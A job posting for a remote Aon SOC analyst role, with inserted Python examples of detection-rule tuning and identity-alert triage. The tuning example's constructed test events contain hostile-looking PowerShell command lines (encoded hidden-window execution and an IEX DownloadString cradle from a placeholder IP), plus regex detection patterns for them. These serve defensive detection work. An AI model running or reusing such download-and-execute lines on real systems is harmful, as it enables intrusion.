Cybersecurity Operations Analyst

Location: Dallas, TX, USA
Remote: Fully Remote
Published: 6/18/2026
Insurance Operations Manager
Full time

Job Description

The Cybersecurity Analyst – Threat Detection, Automation & SOC Operations is a hands-on role supporting Aon's global Cybersecurity Command Center (AC3). This position is designed for SOC analysts (Level 1–Level 3) focused on alert triage, incident investigation, and continuous improvement of detection and automation capabilities.

The role involves monitoring and analyzing security events, responding to alerts, and enhancing alert quality, playbooks, and workflows. The analyst will collaborate closely with Security Operations, Threat Intelligence, Security Engineering, and Incident Response teams to ensure comprehensive coverage across endpoint, identity, cloud, email, and network environments.

The ideal candidate is curious, analytical, and comfortable working directly with security tooling—investigating alerts, understanding attacker behavior, and contributing to the tuning and automation of SOC workflows.

Aon is in the business of better decisions

At Aon, we shape decisions for the better to protect and enrich the lives of people around the world.

As an organization, we are united through trust as one engaged team and we are passionate about helping our colleagues and clients succeed.

What the day will look like

SOC Monitoring & Investigation

  • Monitor and triage alerts across platforms including LogScale, CrowdStrike Falcon, XSOAR, Microsoft, and Okta
  • Perform initial investigation and validation of security events to determine severity and scope
  • Escalate incidents with clear documentation, supporting evidence, and recommended actions
  • Conduct in-depth investigations into suspicious endpoint, identity, network, and cloud activity (L2/L3)
  • Support incident containment and remediation in coordination with Incident Response and Engineering teams

Detection Development & Tuning

  • Provide feedback on alert quality, noise, and detection gaps based on operational experience
  • Assist in creating and refining detection rules and correlation logic using real-world cases and threat intelligence
  • Tune existing detections to reduce false positives and improve SOC efficiency
  • Validate detection effectiveness against known attacker behaviors and MITRE ATT&CK techniques
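As an added example (not Aon or AC3 code) of what tuning and validating a detection looks like in practice: a PowerShell-execution rule mapped to ATT&CK T1059.001 is run over a small set of constructed, labelled process events, once as first deployed and once after tuning. The hostnames, users, command lines, the base64 placeholder and the SCCM exclusion are all constructed for illustration, and the precision/recall harness is the kind of regression check an analyst keeps from closed cases.

```python
"""Detection rule tuning and validation over constructed endpoint telemetry.

Added example; not Aon or AC3 code. Event fields, hosts, users and the
process/command lines below are all constructed for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import Callable, List

# Constructed process-creation events with a ground-truth label, as an analyst
# would keep from closed cases to regression-test a rule. The base64 blob in
# event 1 is a placeholder, not a real payload.
EVENTS = [
    {"id": 1, "host": "wks-0142", "user": "jdoe", "parent": "outlook.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
     "label": "malicious"},
    {"id": 2, "host": "srv-sccm01", "user": "SYSTEM", "parent": "ccmexec.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NonInteractive -ExecutionPolicy Bypass -File C:\\Windows\\CCM\\SystemTemp\\inventory.ps1",
     "label": "benign"},
    {"id": 3, "host": "wks-0207", "user": "mlee", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a')",
     "label": "malicious"},
    {"id": 4, "host": "srv-bkp02", "user": "svc_backup", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File D:\\backup\\rotate.ps1", "label": "benign"},
    {"id": 5, "host": "wks-0311", "user": "rkim", "parent": "wmiprvse.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"$p=[Convert]::FromBase64String('U3RhcnQtUHJvY2Vzcw==');IEX([Text.Encoding]::Unicode.GetString($p))\"",
     "label": "malicious"},
    {"id": 6, "host": "wks-0142", "user": "jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process", "label": "benign"},
]


@dataclass
class Rule:
    name: str
    attack_id: str          # MITRE ATT&CK technique the rule is meant to cover
    severity: str
    match: Callable[[dict], bool]
    exclusions: List[Callable[[dict], bool]] = field(default_factory=list)

    def fires(self, event: dict) -> bool:
        """A rule fires when its match logic hits and no tuning exclusion applies."""
        return self.match(event) and not any(ex(event) for ex in self.exclusions)


def _is_powershell(e: dict) -> bool:
    return e["image"].lower() in ("powershell.exe", "pwsh.exe")


# v1: the rule as first deployed. Fires on any PowerShell command line carrying a
# classic suspicious flag. Noisy on management tooling and blind to payloads that
# decode base64 without -enc.
SUSPICIOUS_V1 = re.compile(r"-enc\w*|-w(?:indowstyle)?\s+hidden|bypass|downloadstring", re.I)
RULE_V1 = Rule(
    name="Suspicious PowerShell Execution", attack_id="T1059.001", severity="high",
    match=lambda e: _is_powershell(e) and bool(SUSPICIOUS_V1.search(e["cmdline"])),
)

# v2: tuned from the v1 results. Adds the base64-decode pattern and parent-process
# context seen in the reviewed cases (Office and WMI spawning PowerShell), and
# excludes the SCCM client invoking scripts from its own directory.
SUSPICIOUS_V2 = re.compile(
    r"-enc\w*|-w(?:indowstyle)?\s+hidden|bypass|downloadstring|frombase64string", re.I)
SUSPICIOUS_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "wmiprvse.exe"}
RULE_V2 = Rule(
    name="Suspicious PowerShell Execution", attack_id="T1059.001", severity="high",
    match=lambda e: _is_powershell(e) and (
        bool(SUSPICIOUS_V2.search(e["cmdline"])) or e["parent"].lower() in SUSPICIOUS_PARENTS),
    exclusions=[
        # SCCM client running its own scripts: benign in every reviewed case.
        lambda e: e["parent"].lower() == "ccmexec.exe" and "\\windows\\ccm\\" in e["cmdline"].lower(),
    ],
)


def evaluate(rule: Rule, events: List[dict]) -> dict:
    """Run a rule over labelled events and report hits plus precision/recall."""
    tp = fp = fn = tn = 0
    hits = []
    for e in events:
        fired, malicious = rule.fires(e), e["label"] == "malicious"
        if fired:
            hits.append(e["id"])
        if fired and malicious:
            tp += 1
        elif fired:
            fp += 1
        elif malicious:
            fn += 1
        else:
            tn += 1
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return {"rule": rule.name, "attack_id": rule.attack_id, "hits": hits,
            "tp": tp, "fp": fp, "fn": fn, "tn": tn,
            "precision": round(precision, 2), "recall": round(recall, 2)}


if __name__ == "__main__":
    for rule in (RULE_V1, RULE_V2):
        print(evaluate(rule, EVENTS))
```

The point of keeping labelled events next to the rule is that every tuning change is checked both ways: the SCCM exclusion must remove the false positive without hiding the Office-spawned cases, and the new base64 pattern must pick up the miss without re-introducing noise. Exclusions are scoped to parent process plus path rather than to a hostname, so the same rule still fires if an attacker runs PowerShell on the SCCM server from any other parent.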

Investigation Enablement

  • Design and refine investigative workflows to guide analysts from triage through resolution
  • Develop and maintain runbooks, playbooks, and procedural guides for common alert types
  • Identify missing context or data needed to accelerate investigations (e.g., enrichment, logging, asset data)
  • Recommend and implement improvements that reduce analyst effort and decision time

Security Automation & Playbooks

  • Utilize and enhance XSOAR playbooks and automation workflows within daily SOC operations
  • Identify repetitive tasks suitable for automation and partner with engineering teams to implement solutions
  • Test, validate, and optimize automated actions to ensure they support investigations effectively
  • Contribute to continuous improvement initiatives focused on SOC scalability, speed, and consistency
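An added example, not Aon, AC3 or XSOAR code, of the kind of repetitive first-pass triage that is a candidate for playbook automation: an identity alert is enriched (corporate egress ranges, device inventory, user baseline, recent Okta MFA events), scored, routed, and handed on with the evidence an escalation should carry. The enrichment tables, thresholds, scores, alerts and events are all constructed; the Okta field names are approximations of System Log records, not the exact schema.

```python
"""First-pass triage of an identity alert, shaped like a SOAR playbook task.

Added example; not Aon or AC3 code and not an XSOAR integration. Enrichment
sources, thresholds, scores, alerts and the Okta-style events are constructed.
"""
import ipaddress
from datetime import datetime, timedelta

# Constructed enrichment data a playbook would normally pull through integrations.
VPN_EGRESS = [ipaddress.ip_network("203.0.113.0/24")]   # documentation range standing in for corporate VPN egress
MANAGED_DEVICES = {"LAPTOP-7F3A2C": {"owner": "jdoe", "edr_sensor": True}}
USER_BASELINE = {"jdoe": {"countries": {"US"}}}

# Constructed events shaped like Okta System Log MFA records (field names approximate).
OKTA_EVENTS = [
    {"user": "jdoe", "eventType": "user.authentication.auth_via_mfa", "outcome": "FAILURE",
     "reason": "USER_DENIED", "published": "2026-06-18T08:01:10Z"},
    {"user": "jdoe", "eventType": "user.authentication.auth_via_mfa", "outcome": "FAILURE",
     "reason": "USER_DENIED", "published": "2026-06-18T08:03:42Z"},
    {"user": "jdoe", "eventType": "user.authentication.auth_via_mfa", "outcome": "FAILURE",
     "reason": "USER_DENIED", "published": "2026-06-18T08:06:05Z"},
    {"user": "jdoe", "eventType": "user.authentication.auth_via_mfa", "outcome": "FAILURE",
     "reason": "USER_DENIED", "published": "2026-06-18T08:09:30Z"},
    {"user": "jdoe", "eventType": "user.authentication.auth_via_mfa", "outcome": "SUCCESS",
     "reason": None, "published": "2026-06-18T08:11:50Z"},
]

# Two constructed alerts: a routine login over VPN, and a login that follows a burst of denied pushes.
ALERTS = [
    {"id": "ALR-1001", "user": "jdoe", "client_ip": "203.0.113.45", "country": "US",
     "device_name": "LAPTOP-7F3A2C", "published": "2026-06-18T09:30:00Z"},
    {"id": "ALR-1002", "user": "jdoe", "client_ip": "198.51.100.77", "country": "RO",
     "device_name": "DESKTOP-Q9Z1", "published": "2026-06-18T08:12:00Z"},
]


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def is_vpn_egress(ip: str) -> bool:
    return any(ipaddress.ip_address(ip) in net for net in VPN_EGRESS)


def denied_pushes(user: str, before: datetime, window_min: int, events) -> int:
    """Count MFA pushes the user denied in the window before the alert time."""
    start = before - timedelta(minutes=window_min)
    return sum(1 for e in events
               if e["user"] == user and e["outcome"] == "FAILURE"
               and e.get("reason") == "USER_DENIED"
               and start <= _ts(e["published"]) <= before)


def triage(alert: dict, events=OKTA_EVENTS) -> dict:
    """Enrich, score and route one alert; returns the record the next analyst reads."""
    user, when = alert["user"], _ts(alert["published"])
    score, evidence, techniques = 0, [], []

    if is_vpn_egress(alert["client_ip"]):
        score -= 2
        evidence.append(f"{alert['client_ip']} is corporate VPN egress")
    else:
        evidence.append(f"{alert['client_ip']} is not a known corporate egress")

    baseline = USER_BASELINE.get(user, {"countries": set()})
    if alert["country"] not in baseline["countries"]:
        score += 2
        evidence.append(f"login country {alert['country']} outside user baseline {sorted(baseline['countries'])}")

    device = MANAGED_DEVICES.get(alert["device_name"])
    if device and device["owner"] == user and device["edr_sensor"]:
        score -= 1
        evidence.append(f"{alert['device_name']} is managed, owned by {user}, EDR sensor present")
    else:
        score += 2
        evidence.append(f"{alert['device_name']} not in inventory or not owned by {user}")

    denied = denied_pushes(user, when, 15, events)
    if denied >= 3:
        score += 3
        techniques.append("T1621")   # ATT&CK: Multi-Factor Authentication Request Generation
        evidence.append(f"{denied} denied MFA pushes in the 15 min before this login")

    if score <= 0:
        verdict, action = "auto_close", "close with evidence attached; no analyst action"
    elif score < 4:
        verdict, action = "escalate_L2", "L2 review: confirm activity with user, review session"
    else:
        verdict, action = "escalate_IR", "terminate Okta sessions, reset MFA factors, open IR case"

    return {"alert_id": alert["id"], "user": user, "score": score, "verdict": verdict,
            "attack_techniques": techniques, "evidence": evidence, "recommended_action": action}


if __name__ == "__main__":
    for alert in ALERTS:
        print(triage(alert))
```

Two design choices matter for a playbook like this. The automated action is a recommendation with attached evidence, not the containment itself, so a wrong auto-close is visible in the record and a wrong escalation still gets a human look before sessions are killed. And every score contribution writes a sentence of evidence, so the handoff to L2 or IR already contains the "why" that the escalation bullets above ask for.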

Security Analytics & Telemetry

  • Develop and execute queries in LogScale and other analytics platforms to support investigations and threat hunting
  • Analyze telemetry across endpoint, identity, cloud, email, and network sources to identify suspicious activity
  • Identify trends, recurring issues, and visibility gaps
  • Support development of dashboards and reporting for SOC performance and incident trends

Collaboration & Knowledge Sharing

  • Partner with AC3 analysts to identify operational challenges and propose improvements
  • Work with Threat Intelligence and PTO teams to operationalize intelligence into detections and playbooks
  • Collaborate with Security Engineering to enhance logging, telemetry, and data availability
  • Contribute to post-incident reviews and continuously update runbooks and detections

How this opportunity is different

  • Combines SOC operations, detection engineering, and automation—not just alert triage.
  • Lets analysts directly shape detections, playbooks, and workflows instead of only following them.
  • Clear focus on XSOAR and automation, giving a defined growth path into advanced detection and engineering roles.
  • Broad visibility across endpoint, identity, cloud, email, and network with modern tooling (LogScale, CrowdStrike, Microsoft, Okta).


Skills and experience that will lead to success

  • Minimum 2+ years of experience in a SOC, Cyber Defense Center, MDR, or similar environment (L1–L3) preferred
  • Strong understanding of attack techniques, alerting, and MITRE ATT&CK framework
  • Hands-on experience with SIEM platforms such as LogScale, Splunk, Microsoft Sentinel, or Elastic
  • Familiarity with EDR tools (preferably CrowdStrike Falcon)
  • Exposure to SOAR platforms (e.g., XSOAR) and interest in automation
  • Basic scripting experience (Python, PowerShell, or similar) preferred
  • Strong analytical, troubleshooting, and evidence-based decision-making skills
  • Effective written and verbal communication, including incident documentation and handoffs

Preferred Backgrounds

  • SOC Analyst (Tier 1–3)
  • MDR Analyst
  • Incident Response Analyst
  • Threat Detection Analyst
  • Detection Engineer (with SOC experience)
  • Security Operations Engineer
  • Security Content Developer (with SOC exposure)

Education: Bachelor's degree in Computer Science or equivalent years of industry experience.

For positions in San Francisco and Los Angeles, we will consider for employment qualified applicants with arrest and conviction record in accordance with local Fair Chance ordinances.

Aon is not accepting unsolicited resumes from search firms for this position. If you are a search firm, you will not be compensated in any way for your submission of a candidate, even if Aon hires that candidate.

Nothing in this job description restricts management's right to assign or reassign duties and responsibilities to this job at any time.

Pay Transparency Laws: The salary range for this position (intended for U.S. applicants) is $90,000 to $106,000 annually. The actual salary will vary based on applicant's education, experience, skills, and abilities, as well as internal equity and alignment with market data. The salary may also be adjusted based on applicant's geographic location.

A summary of all the benefits offered for this position:

Aon offers a comprehensive package of benefits for full-time and regular part-time colleagues, including, but not limited to: a 401(k) savings plan with employer contributions; an employee stock purchase plan; consideration for long-term incentive awards at Aon's discretion; medical, dental and vision insurance. This role does not accrue vacation. Rather, this role is eligible to take paid time off at the discretion of the employee and management in accordance with company policy and practices. Various other types of leaves of absence; paid sick leave as provided under state and local paid sick leave laws, short-term disability and optional long-term disability, health savings account, health care and dependent care reimbursement accounts, employee and dependent life insurance and supplemental life and AD&D insurance; optional personal insurance policies, adoption assistance, tuition assistance, commuter benefits, and an employee assistance program that includes free counseling sessions. Eligibility for benefits is governed by the applicable plan documents and policies.

2579990